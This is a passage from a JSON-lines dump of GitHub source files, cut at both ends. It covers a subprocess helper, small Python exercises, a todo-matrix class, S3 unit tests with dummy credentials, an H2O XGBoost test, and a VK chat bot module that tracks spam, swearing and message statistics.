subprocess.STARTUPINFO()\n kwargs['startupinfo'].dwFlags |= subprocess.STARTF_USESHOWWINDOW\n kwargs['stdin'] = subprocess.PIPE\n process = subprocess.Popen(args, **kwargs)\n\n with process.stdout:\n for line in iter(process.stdout.readline, b''):\n g.log.debug(line.rstrip().decode('utf-8'))\n exitcode = process.wait()\n if exitcode != 0:\n log.warning('exitcode: %d' % exitcode)\n return exitcode\n","repo_name":"awforsythe/fscan","sub_path":"app/core/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15655408913","text":"def create_matrix(n_lines):\n result = []\n for line in range(n_lines):\n result.append(list(int(el) for el in input().split()))\n return result\n\ndef run_command(command, matrix, range):\n command_type = command.split()[0]\n row, col, value = [int(el) for el in command.split()[1:]]\n is_valid = True\n if row not in range or col not in range:\n is_valid = False\n else:\n if command_type == \"Add\":\n matrix[row][col] += value\n else:\n matrix[row][col] -= value\n if not is_valid:\n print(\"Invalid coordinates\")\n\ndef print_result(matrix):\n for row in matrix:\n print(*[str(el) for el in row], sep=\" \")\n\n#read input and create matrix\nrows = int(input())\nmatrix = (create_matrix(rows))\nmatrix_range = range(0, rows)\n\n#read commands\nwhile True:\n command = input()\n if command == \"END\":\n break\n else:\n run_command(command, matrix, matrix_range)\n\nprint_result(matrix)","repo_name":"geodimitrov/Python-Advanced-SoftUni","sub_path":"Comprehensions/Exercises/10. matrix_modification.py","file_name":"10. matrix_modification.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71442582594","text":"import csv\nimport os\nfrom datetime import datetime, date\nfrom todo_item import TodoItem\nfrom todo_quarter import TodoQuarter\n\n\nclass TodoMatrix:\n \"\"\"\n Parameters:\n ----------\n Raises:\n ----------\n \"\"\"\n\n def __init__(self):\n\n self.todo_quarters = {'IU': TodoQuarter(),\n 'IN': TodoQuarter(),\n 'NU': TodoQuarter(),\n 'NN': TodoQuarter()}\n\n\n def get_quarter(self, status):\n\n for item in self.todo_quarters.keys():\n\n if status == item:\n \n return self.todo_quarters[status]\n\n\n def add_item(self, title, deadline, is_important=False):\n\n if not isinstance(deadline, date):\n raise TypeError(\"wrong date format!\")\n\n else:\n if is_important and (deadline - datetime.today()).days <= 3:\n self.todo_quarters['IU'].add_item(title, deadline)\n elif is_important:\n self.todo_quarters['IN'].add_item(title, deadline)\n elif is_important is False and (deadline - datetime.today()).days <= 3:\n self.todo_quarters['NU'].add_item(title, deadline)\n elif is_important is False:\n self.todo_quarters['NN'].add_item(title, deadline)\n\n\n def add_items_from_file(self, file_name = 'todo_items_read_test.csv'):\n\n if not os.path.isfile(file_name):\n raise FileNotFoundError\n\n else:\n with open(file_name, 'r') as csvfile:\n spamreader = csv.reader(csvfile, delimiter='|')\n\n for row in spamreader:\n title = row[0]\n is_important = False\n if row[2]:\n is_important = True\n\n deadline = datetime.strptime(row[1]+\"-2017\", \"%d-%m-%Y\")\n self.add_item(title, deadline, is_important)\n\n\n def save_items_to_file(self, file_name = 'todo_items_save_test.csv'):\n\n\n with open(file_name, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter='|')\n\n for key, value in self.todo_quarters.items():\n for task in value.todo_items:\n # print (task)\n date = '-'.join([str(task.deadline.day), str(task.deadline.month)])\n\n if key == 'IU' or key == 'IN':\n writer.writerow([task.title, date, \"important\"])\n else:\n writer.writerow([task.title, date, \"\"])\n\n\n def archive_items(self):\n\n for key, value in self.todo_quarters.items():\n value.archive_items()\n\n\n def __str__(self):\n\n for key in self.todo_quarters.keys():\n print (key + ':')\n print (str(self.todo_quarters[key]))\n\n","repo_name":"Ziem0/Eisenhower_Matrix","sub_path":"todo_matrix.py","file_name":"todo_matrix.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40217650899","text":"def count_trees(matrix, step_x, step_y):\n x = 0\n y = 0\n nb_trees = 0\n tree_symbol = \"#\"\n while x < len(matrix):\n if (matrix[x][y % len(matrix[x])]) == tree_symbol:\n nb_trees += 1\n x += step_x\n y += step_y\n return nb_trees\n\n\nfilepath = \"inputs/day3_input.txt\"\nwith open(filepath, 'r') as f:\n m = [[s for s in line] for line in f.read().split('\\n')]\nnb11 = count_trees(m, 1, 1)\nnb13 = count_trees(m, 1, 3)\nnb15 = count_trees(m, 1, 5)\nnb17 = count_trees(m, 1, 7)\nnb21 = count_trees(m, 2, 1)\nprint(nb11)\nprint(nb13)\nprint(nb15)\nprint(nb17)\nprint(nb21)\nprint(nb11 * nb13 * nb15 * nb17 * nb21)\n","repo_name":"Dralnar/AdventCode","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75146955714","text":"import sys\nsys.path.append('./src/')\nimport json\nfrom ingestion.dates import retrieve_last_updated\nfrom ingestion.dates import store_last_updated\nfrom ingestion.utils import get_ingested_bucket_name\nfrom moto import mock_s3\nimport boto3\nfrom datetime import datetime\nimport pytest\nimport os\n\n\n# Mocking AWS credentials\n@pytest.fixture(scope='module')\ndef aws_credentials():\n '''Mocked AWS credentials for moto.'''\n\n os.environ['AWS_ACCESS_KEY_ID'] = 'test'\n os.environ['AWS_SECRET_ACCESS_KEY'] = 'test'\n os.environ['AWS_SECURITY_TOKEN'] = 'test'\n os.environ['AWS_SESSION_TOKEN'] = 'test'\n os.environ['AWS_DEFAULT_REGION'] = 'us-east-1'\n\n\n@pytest.fixture(scope='module')\ndef s3_s(aws_credentials):\n with mock_s3():\n yield boto3.client('s3')\n\n\n@pytest.fixture(scope='function')\ndef bucket(s3_s):\n s3_s.create_bucket(\n Bucket='s3-de-ingestion-query-queens-test-bucket'\n )\n\n\ndef test_store_last_updated_stores_last_updated(bucket, s3_s):\n date_string = \"2022-11-03T14:20:49.962000\"\n store_last_updated(date_string, date_string)\n response = s3_s.list_objects_v2(\n Bucket=get_ingested_bucket_name(),\n Prefix='date/'\n )\n list_of_files = [item['Key'] for item in response['Contents']]\n assert ['date/date.json', 'date/last_updated.json'] == list_of_files\n result = retrieve_last_updated()\n assert result == datetime.strptime(date_string, '%Y-%m-%dT%H:%M:%S.%f')\n\n\ndef test_store_last_updated_copies_previous_update(bucket, s3_s):\n test_date = \"2000-11-03T14:20:49.962000\"\n store_last_updated(test_date, test_date)\n\n dt = \"2022-11-03T14:20:49.962000\"\n store_last_updated(dt, dt)\n\n response = s3_s.list_objects_v2(\n Bucket=get_ingested_bucket_name(),\n Prefix='date/'\n )\n list_of_files = [item['Key'] for item in response['Contents']]\n assert ['date/date.json', 'date/last_updated.json', 'date/temp_date.json'] == list_of_files\n result = retrieve_last_updated()\n assert result == datetime.strptime(dt, '%Y-%m-%dT%H:%M:%S.%f')\n\n res = s3_s.get_object(\n Bucket=get_ingested_bucket_name(),\n Key='date/temp_date.json'\n )\n json_res = json.loads(res['Body'].read())\n timestamp = json_res['last_updated']\n assert timestamp == \"2000-11-03T14:20:49.962000\"\n\n","repo_name":"rexhao362/de-jan-23-project","sub_path":"test/lambdas/ingestion/utils/test_store_last_updated.py","file_name":"test_store_last_updated.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13349828684","text":"import sys\nimport os\nimport csv\nsys.path.insert(1, \"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.xgboost import H2OXGBoostEstimator\n\n\n# this is more of a demo of how to use mojo_predict_csv to test prediction contributions concurrently\n# the dataset is likely too small to reliably catch problems (it might reveal something once in a while)\ndef demo_xgboost_concurrent_contributions():\n prostate_path = pyunit_utils.locate(\"smalldata/logreg/prostate.csv\")\n\n prostate = h2o.import_file(path=prostate_path)\n prostate[\"CAPSULE\"] = prostate[\"CAPSULE\"].asfactor()\n\n xgb_model = H2OXGBoostEstimator()\n xgb_model.train(x=[\"AGE\", \"RACE\", \"DPROS\", \"DCAPS\", \"PSA\", \"VOL\", \"GLEASON\"], y=\"CAPSULE\", training_frame=prostate)\n\n results_dir = os.path.join(pyunit_utils.locate(\"results\"), \"xgb_concurrent\")\n os.mkdir(results_dir)\n mojo_path = xgb_model.download_mojo(results_dir, get_genmodel_jar=True)\n\n # how many parallel threads to run\n concurrency = 4\n\n reference_result = h2o.mojo_predict_csv(input_csv_path=prostate_path, mojo_zip_path=mojo_path,\n output_csv_path=os.path.join(results_dir, \"predictions.csv\"),\n predict_contributions=True,\n extra_cmd_args=[\"--testConcurrent\", str(concurrency)])\n print(reference_result)\n\n for test_id in range(4):\n with open(os.path.join(results_dir, \"predictions.csv.\" + str(test_id))) as csv_file:\n concurrent_result = list(csv.DictReader(csv_file))\n assert reference_result == concurrent_result\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(demo_xgboost_concurrent_contributions)\nelse:\n demo_xgboost_concurrent_contributions()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/xgboost/pyunit_mojo_concurrent_contribs_xgboost.py","file_name":"pyunit_mojo_concurrent_contribs_xgboost.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"4180533347","text":"import os.path\nfrom time import time\nfrom OpenFiles import OpenUserMessage, CloseUserMessage, OpenSwearList, CloseSwearList\nfrom SendMessage import SendMsgToChat\nfrom random import choice\n\ndef ReadAndAddMessageToFile(event, UserMessages, msg, ChatSet, session, vk_session):\n global PreviousTime, NowTime\n SpamUnDetected=True\n FilePath='/app/Data/UserMessages/User_'+str(event.obj.from_id)+'_in chat_'+str(event.chat_id)+'.txt'\n if os.path.isfile(FilePath) and (os.stat(FilePath).st_size!=0):\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для чтения сообщений пользователя из уже существующего файла', 'r')\n messages=int(UserMessageFile.readline().split()[1]) # messages=\n UserMessages={}\n for mess in range(messages):\n UserMessageFile.readline() # **********\n UserMessages[mess]={}\n UserMessages[mess]['time']=str(UserMessageFile.readline().split()[1])\n# print('из UsersMessages.py:\\nUserMessages[{}][\"time\"]={}\\n'.format(mess, UserMessages[mess]['time']))\n\n UserMessages[mess]['text']=str(' '.join(UserMessageFile.readline().split()[1:]))\n# print('из UsersMessages.py:\\nUserMessages[{}][\"text\"]={}\\n'.format(mess, UserMessages[mess]['text']))\n\n UserMessages[mess]['attachment']=int(UserMessageFile.readline().split()[1])\n# print('из UsersMessages.py:\\nUserMessages[{}][\"attachment\"]={}\\n'.format(mess, UserMessages[mess]['attachment']))\n\n if UserMessages[mess]['attachment']>0:\n tempatt=UserMessages[mess]['attachment']\n UserMessages[mess]['attachment']={}\n for att in range(tempatt):\n tempadress=UserMessageFile.readline().split()\n# print('из UsersMessages.py:\\ntempadress={}\\n'.format(tempadress))\n UserMessages[mess]['attachment'][tempadress[0]]=tempadress[1]\n# print('из UsersMessages.py:\\nUserMessages[{}][\"attachment\"][{}]={}\\n'.format(mess,tempadress[0],tempadress[1]))\n CloseUserMessage('после чтения сообщений пользователя из уже существующего файла', UserMessageFile)\n\n# print('UsersMessages numbers: {}\\n'.format(UserMessages))\n\n TempMessage={}\n if len(UserMessages.keys())>149:\n UserMessages.pop(149)\n TextToFile='messages= '+str(len(UserMessages.keys())+1)+'\\n'\n# UserMessageFile.write(TextToFile)\n TextToFile=TextToFile+'******************************\\n'\n# UserMessageFile.write('******************************\\n')\n TempMessage['time']=str(time())\n TextToFile=TextToFile+'time: '+str(time())+'\\n'\n# TextToFile='time: '+str(time())+'\\n'\n# UserMessageFile.write(TextToFile)\n if msg!='':\n if len(msg)>ChatSet['parametrs']['max_message_len']:\n TempMessage['text']='\"Слишком большое, похожее на спам сообщение\"'\n TextToFile=TextToFile+'text: \"Слишком большое, похожее на спам сообщение\"\\n'\n# TextToFile='text: \"Слишком большое, похожее на спам сообщение\"\\n'\n# UserMessageFile.write(TextToFile)\n else:\n msg=msg.replace('\\n','/n')\n TempMessage['text']=msg\n TextToFile=TextToFile+'text: '+msg+'\\n'\n# TextToFile='text: '+msg+'\\n'\n# UserMessageFile.write(TextToFile)\n else:\n TempMessage['text']='/NONE/'\n TextToFile=TextToFile+'text: /NONE/\\n'\n# TextToFile='text: /NONE/\\n'\n# UserMessageFile.write(TextToFile)\n# print('\\nTextToFile0: \\n', TextToFile,'\\n')\n if str(event.object.attachments)!='[]':\n TempMessage['attachments']={}\n TextToFile=TextToFile+'attachments: '+str(len(event.object.attachments))+'\\n'\n# TextToFile='attachments: '+str(len(event.object.attachments))+'\\n'\n# UserMessageFile.write(TextToFile)\n for elem in event.object.attachments:\n if elem['type']=='photo':\n maxwidth=0\n maxheight=0\n for slice in elem['photo']['sizes']:\n if slice['width']>=maxwidth and slice['height']>=maxheight:\n maxwidth=slice['width']\n maxheight=slice['height']\n url=slice['url']\n TempMessage['attachments'][str(elem['type'])]=str(url)\n TextToFile=TextToFile+str(elem['type'])+' '+str(url)+'\\n'\n# TextToFile=str(elem['type'])+' '+str(url)+'\\n'\n# UserMessageFile.write(TextToFile)\n elif elem['type']=='video':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='audio':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='doc':\n# TextToFile=str(elem[elem['type']]['ext'])+' '+str(elem[elem['type']]['url'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem[elem['type']]['ext'])]=str(elem[elem['type']]['url'])\n TextToFile=TextToFile+str(elem[elem['type']]['ext'])+' '+str(elem[elem['type']]['url'])+'\\n'\n elif elem['type']=='wall':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='sticker':\n# TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['sticker_id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['sticker_id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['sticker_id'])+'\\n'\n elif elem['type']=='graffiti':\n# TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['url'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'_'+str(elem[elem['type']]['access_key'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'_'+str(elem[elem['type']]['access_key'])+'\\n'\n elif elem['type']=='audio_message':\n# TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['link_mp3'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['link_mp3'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['link_mp3'])+'\\n'\n elif elem['type']=='poll':\n# TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments'][str(elem['type'])]=str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n elif elem['type']=='link':\n TempMessage['attachments'][str(elem['type'])]=str(elem[elem['type']]['url'])\n TextToFile=TextToFile+str(elem['type'])+' '+str(elem[elem['type']]['url'])+'\\n'\n else:\n# TextToFile='attachments: 0\\n'\n# UserMessageFile.write(TextToFile)\n TempMessage['attachments']=0\n TextToFile=TextToFile+'attachments: 0\\n'\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для записи нового сообщения пользователя в уже существующий файл', 'w')\n# print('UsersMessages.py\\ntext:\\n{}\\n\\nTempMess:\\n{}\\n'.format(TextToFile, TempMessage))\n\n PreviousTime=0\n NowTime=0\n for elem in range(len(list(UserMessages[0]['time']))):\n if list(UserMessages[0]['time'])[elem]=='.':\n PreviousTime=int(''.join(list(UserMessages[0]['time'])[0:elem]))\n micro=int(''.join(list(UserMessages[0]['time'])[(elem+1):]))\n PreviousTime=PreviousTime+(micro/10**len(str(micro)))\n break\n for elem in range(len(list(TempMessage['time']))):\n if list(TempMessage['time'])[elem]=='.':\n NowTime=int(''.join(list(TempMessage['time'])[0:elem]))\n micro=int(''.join(list(TempMessage['time'])[(elem+1):]))\n NowTime=NowTime+(micro/10**len(str(micro)))\n break\n\n\n# print('\\nUsersMessages prev: \\n', UserMessages,'\\n')\n# print('\\nTempMessage итог: \\n', TempMessage,'\\n')\n# print('\\nNowTime-PreviousTime итог: \\n', NowTime-PreviousTime,'\\n')\n if TempMessage['attachments']!=0 and UserMessages[0]['attachment']!=0 and (TempMessage['attachments']==UserMessages[0]['attachment']):\n SpamUnDetected=False\n TextToFile='messages= '+str(len(UserMessages.keys()))+'\\n'\n# print('\\nTextToFile итог1: \\n', TextToFile,'\\n')\n UserMessageFile.write(TextToFile)\n elif (UserMessages[0]['text']==TempMessage['text'] and (UserMessages[0]['text']!='/NONE/' and TempMessage['text']!='/NONE/')) or (NowTime-PreviousTime)<1.0:\n TextToFile='messages= '+str(len(UserMessages.keys()))+'\\n'\n # print('\\nTextToFile итог2: \\n', TextToFile,'\\n')\n UserMessageFile.write(TextToFile)\n SpamUnDetected=False\n else:\n# print('\\nTextToFile итог3: \\n', TextToFile,'\\n')\n UserMessageFile.write(TextToFile)\n\n for mess in UserMessages.keys():\n UserMessageFile.write('******************************\\n')\n TextToFile='time: '+str(UserMessages[mess]['time'])+'\\n'\n UserMessageFile.write(TextToFile)\n TextToFile='text: '+str(UserMessages[mess]['text'])+'\\n'\n UserMessageFile.write(TextToFile)\n if UserMessages[mess]['attachment']==0:\n TextToFile='attachment: 0\\n'\n UserMessageFile.write(TextToFile)\n else:\n TextToFile='attachment: '+str(len(UserMessages[mess]['attachment']))+'\\n'\n UserMessageFile.write(TextToFile)\n for elem in UserMessages[mess]['attachment'].keys():\n TextToFile=str(elem)+' '+str(UserMessages[mess]['attachment'][elem])+' \\n'\n UserMessageFile.write(TextToFile)\n CloseUserMessage('после записи всех сообщений пользователя в уже существующий файл', UserMessageFile)\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для чтения сообщений пользователя из уже существующего файла', 'r')\n messages=int(UserMessageFile.readline().split()[1]) # messages=\n UserMessages={}\n for mess in range(messages):\n UserMessageFile.readline() # **********\n UserMessages[mess]={}\n UserMessages[mess]['time']=str(UserMessageFile.readline().split()[1])\n UserMessages[mess]['text']=str(' '.join(UserMessageFile.readline().split()[1:]))\n UserMessages[mess]['attachment']=int(UserMessageFile.readline().split()[1])\n if UserMessages[mess]['attachment']>0:\n tempatt=UserMessages[mess]['attachment']\n UserMessages[mess]['attachment']={}\n for att in range(tempatt):\n tempadress=UserMessageFile.readline().split()\n UserMessages[mess]['attachment'][tempadress[0]]=tempadress[1]\n CloseUserMessage('после чтения сообщений пользователя из уже существующего файла', UserMessageFile)\n else:\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для записи нового сообщения пользователя в новый файл', 'w')\n TextToFile='messages= 1\\n'\n UserMessageFile.write(TextToFile)\n UserMessageFile.write('******************************\\n')\n TextToFile='time: '+str(time())+'\\n'\n UserMessageFile.write(TextToFile)\n if msg!='':\n if len(msg)>=ChatSet['parametrs']['max_message_len']:\n TextToFile='text: \"Слишком большое, похожее на спам сообщение\"\\n'\n UserMessageFile.write(TextToFile)\n else:\n msg=msg.replace('\\n','/n')\n TextToFile='text: '+msg+'\\n'\n UserMessageFile.write(TextToFile)\n else:\n TextToFile='text: /NONE/\\n'\n UserMessageFile.write(TextToFile)\n if str(event.object.attachments)!='[]':\n TextToFile='attachments: '+str(len(event.object.attachments))+'\\n'\n UserMessageFile.write(TextToFile)\n for elem in event.object.attachments:\n if elem['type']=='photo':\n maxwidth=0\n maxheight=0\n for slice in elem['photo']['sizes']:\n if slice['width']>=maxwidth and slice['height']>=maxheight:\n maxwidth=slice['width']\n maxheight=slice['height']\n url=slice['url']\n TextToFile=str(elem['type'])+' '+str(url)+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='video':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='audio':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='doc':\n TextToFile=str(elem[elem['type']]['ext'])+' '+str(elem[elem['type']]['url'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='wall':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['from_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='sticker':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['sticker_id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='graffiti':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'_'+str(elem[elem['type']]['access_key'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='audio_message':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['link_mp3'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='poll':\n TextToFile=str(elem['type'])+' '+str(elem['type'])+str(elem[elem['type']]['owner_id'])+'_'+str(elem[elem['type']]['id'])+'\\n'\n UserMessageFile.write(TextToFile)\n elif elem['type']=='link':\n TextToFile=str(elem['type'])+' '+str(elem[elem['type']]['url'])+'\\n'\n UserMessageFile.write(TextToFile)\n else:\n TextToFile='attachments: 0\\n'\n UserMessageFile.write(TextToFile)\n CloseUserMessage('после записи первого пользователя в новый файл', UserMessageFile)\n UserMessageFile=OpenUserMessage(event.obj.from_id, event.chat_id, 'для чтения сообщений пользователя из уже существующего файла', 'r')\n messages=int(UserMessageFile.readline().split()[1]) # messages=\n UserMessages={}\n for mess in range(messages):\n UserMessageFile.readline() # **********\n UserMessages[mess]={}\n UserMessages[mess]['time']=str(UserMessageFile.readline().split()[1])\n UserMessages[mess]['text']=str(' '.join(UserMessageFile.readline().split()[1:]))\n UserMessages[mess]['attachment']=int(UserMessageFile.readline().split()[1])\n if UserMessages[mess]['attachment']>0:\n tempatt=UserMessages[mess]['attachment']\n UserMessages[mess]['attachment']={}\n for att in range(tempatt):\n tempadress=UserMessageFile.readline().split()\n UserMessages[mess]['attachment'][tempadress[0]]=tempadress[1]\n CloseUserMessage('после чтения сообщений пользователя из уже существующего файла', UserMessageFile)\n# print('usermessages\\nSpamUnDetected: {}\\n'.format(SpamUnDetected))\n return UserMessages, SpamUnDetected\n\n\n\n\n\n\n\ndef counter(event, UserStats, UserMessages, vk, Check, msg, BotName, ChatSet):\n global PreviousTime, NowTime\n# print('counter\\nPreviousTime: {}\\nNowTime: {}\\n'.format(PreviousTime,NowTime))\n SpamReact={3:'Ты же вкурсе, что спам - это плохо?',5:'Че спамишь то? Делать нефиг?',6:'Еще раз: хватит спамить!',7:'Я за спам, если что баню))',8:'Ты в бан хочешь?',9:'Ну я тебе предупреждал...'}\n if Check==True and UserStats[event.obj.from_id]['BlackList']==0 and (not msg.startswith(BotName)) and (not msg.startswith('Бот')):\n if UserStats[event.obj.from_id]['SpamTotal']!=0:\n UserStats[event.obj.from_id]['SpamTotal']-=1\n SwearList=OpenSwearList('для проверки наличия мата в сообщении')\n Swear=SwearList.read().split()\n CloseSwearList('после считывания списка матов',SwearList)\n SC=False\n for word in UserMessages[0]['text'].lower().split():\n if word in Swear:\n UserStats[event.obj.from_id]['SwearTotal']+=1\n# text='Я считаю, что \"'+word+'\" является матом!!!!'\n# SendMsgToChat(event, text, vk)\n if ChatSet['parametrs']['swear_answer']=='True':\n SC=True\n if SC==True:\n text=choice(['Т�� же вкурсе, что маты - это плохо?','Давайте общаться без мата!','Не матерись!','Фу, как не культурно!'])\n SendMsgToChat(event, text, vk)\n CloseSwearList('После проверки на наличие матов в сообщении', SwearList)\n UserStats[event.obj.from_id]['MessageTotal']+=1\n UserStats[event.obj.from_id]['WordsTotal']+=len(msg.split())\n UserStats[event.obj.from_id]['LetterTotal']+=len(list(msg))\n UserStats[event.obj.from_id]['LastActiveTime']=time()\n Top={}\n for man in UserStats.keys():\n UserStats[man]['Status']=''\n ############################################################ ТОП ПО МАТАМ\n i=0\n for human in UserStats.keys():\n Top[i]=[human,UserStats[human]['SwearTotal']]\n i+=1\n i=0\n while True:\n if int(Top[i][1])=100:\n Middle=LettersTotal/TotalMessage\n if len(list(msg))>=Middle and (NowTime-PreviousTime)<25.0:\n UserStats[event.obj.from_id]['TypingTime']=NowTime-PreviousTime\n if str(event.object.attachments)!='[]':\n for elem in event.object.attachments:\n if elem['type']=='photo':\n UserStats[event.obj.from_id]['Photos']+=1\n elif elem['type']=='video':\n UserStats[event.obj.from_id]['Videos']+=1\n elif elem['type']=='sticker':\n UserStats[event.obj.from_id]['StickersTotal']+=1\n elif elem['type']=='audio':\n UserStats[event.obj.from_id]['Audios']+=1\n elif elem['type']=='graffiti':\n UserStats[event.obj.from_id]['Graffity']+=1\n elif elem['type']=='audio_message':\n UserStats[event.obj.from_id]['Speech']+=1\n elif elem['type']=='poll':\n UserStats[event.obj.from_id]['Poll']+=1\n elif elem['type']=='doc':\n if elem[elem['type']]['ext']=='gif':\n UserStats[event.obj.from_id]['Gifs']+=1\n elif elem[elem['type']]['ext']=='png' or elem[elem['type']]['ext']=='jpg' or elem[elem['type']]['ext']=='bmp':\n UserStats[event.obj.from_id]['Photos']+=1\n if str(type(UserStats[event.obj.from_id]['Privilege']))==\"\" and 4>UserStats[event.obj.from_id]['Privilege']>-1 and UserStats[event.obj.from_id]['BlackList']==0 and Check==False and UserStats[event.obj.from_id]['Privilege']<1:\n if UserStats[event.obj.from_id]['SpamTotal']==3 or UserStats[event.obj.from_id]['SpamTotal']>=5:\n SendMsgToChat(event, SpamReact[UserStats[event.obj.from_id]['SpamTotal']], vk)\n UserStats[event.obj.from_id]['SpamTotal']+=1\n# print('Counter Spam: ', UserStats[event.obj.from_id]['SpamTotal'],'\\n')\n if UserStats[event.obj.from_id]['SpamTotal']==10:\n UserStats[event.obj.from_id]['BlackList']=1\n UserStats[event.obj.from_id]['SpamTotal']=0\n elif str(type(UserStats[event.obj.from_id]['Privilege']))==\"\" and ChatSet['classes'][UserStats[event.obj.from_id]['Privilege']]['Can_spam']==False and Check==False and UserStats[event.obj.from_id]['BlackList']==0:\n if UserStats[event.obj.from_id]['SpamTotal']==3 or UserStats[event.obj.from_id]['SpamTotal']>=5:\n SendMsgToChat(event, SpamReact[UserStats[event.obj.from_id]['SpamTotal']], vk)\n UserStats[event.obj.from_id]['SpamTotal']+=1\n# print('Counter Spam: ', UserStats[event.obj.from_id]['SpamTotal'],'\\n')\n if UserStats[event.obj.from_id]['SpamTotal']==10:\n UserStats[event.obj.from_id]['BlackList']=1\n UserStats[event.obj.from_id]['SpamTotal']=0\n\n# print('counter проверка 2\\n')\n return UserStats\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"1nfome/VKChatBot","sub_path":"Code/UsersMessages.py","file_name":"UsersMessages.py","file_ext":"py","file_size_in_byte":27312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23578392341","text":"fileName = \"A-large.in\"\nf = open(fileName, 'r')\n\noutputName = \"A-large-out.txt\"\noutput = open(outputName, 'w')\n\nline = f.readline()\nT = int(line)\n\nfor t in range(T):\n res = \"\"\n line = f.readline()\n line = line.split()\n D = int(line[0])\n D = D * 1.0\n N = int(line[1])\n horses = []\n\n for i in range(N):\n line = f.readline()\n line = line.split()\n K = int(line[0])\n S = int(line[1])\n 